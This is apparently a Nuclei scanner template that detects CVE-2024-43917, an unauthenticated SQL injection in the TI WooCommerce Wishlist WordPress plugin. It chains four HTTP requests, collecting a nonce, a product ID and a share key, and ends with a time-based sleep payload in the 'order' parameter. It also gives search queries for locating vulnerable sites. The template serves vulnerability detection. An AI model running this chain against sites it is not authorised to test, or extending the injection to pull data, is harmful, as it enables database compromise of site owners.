134 lines
4.3 KiB
YAML
134 lines
4.3 KiB
YAML
id: CVE-2024-43917
|
|
|
|
info:
|
|
name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
|
|
reference:
|
|
- https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
|
|
- https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-43917
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-43917
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00091
|
|
epss-percentile: 0.39641
|
|
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 4
|
|
vendor: templateinvaders
|
|
product: ti_woocommerce_wishlist
|
|
framework: wordpress
|
|
fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
|
|
publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
|
|
tags: time-based-sqli,cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli
|
|
|
|
flow: http(1) && http(2) && http(3) && http(4)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?p=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
redirects: true
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
internal: true
|
|
name: nonce
|
|
group: 1
|
|
regex:
|
|
- '"nonce":"([a-z0-9]+)"'
|
|
|
|
- raw:
|
|
- |
|
|
GET /product-category/uncategorized/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
internal: true
|
|
name: product_id
|
|
group: 1
|
|
regex:
|
|
- 'data-tinvwl_product_id="([0-9]+)"'
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'data-tinvwl_product_id="'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /product-category/uncategorized/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"
|
|
|
|
[]
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
Content-Disposition: form-data; name="tinv_wishlist_id"
|
|
|
|
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
Content-Disposition: form-data; name="tinv_wishlist_name"
|
|
|
|
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
Content-Disposition: form-data; name="product_type"
|
|
|
|
simple
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
Content-Disposition: form-data; name="product_id"
|
|
|
|
{{product_id}}
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
Content-Disposition: form-data; name="product_variation"
|
|
|
|
0
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
Content-Disposition: form-data; name="product_action"
|
|
|
|
addto
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
|
|
Content-Disposition: form-data; name="redirect"
|
|
|
|
{{RootURL}}/product-category/uncategorized/
|
|
------WebKitFormBoundaryNfcbSwJQX8ALWCMG--
|
|
|
|
extractors:
|
|
- type: json
|
|
part: body
|
|
name: share_key
|
|
internal: true
|
|
json:
|
|
- '.wishlist.share_key'
|
|
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-WP-Nonce: {{nonce}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "duration>=6"
|
|
- "contains(content_type, 'application/json')"
|
|
- "contains(body, 'product_id')"
|
|
condition: and
|
|
# digest: 490a0046304402204b153ed7c5b3dc92d4d2c2a70297f27aa1e7dbca7536714d175bf3f47bc4563702204b51dadeb4ea6405c07478b5bcbe2f3845178386eefd2ab15ca1655afb1dc1d7:922c64590222798bb761d5b6d8e72950 |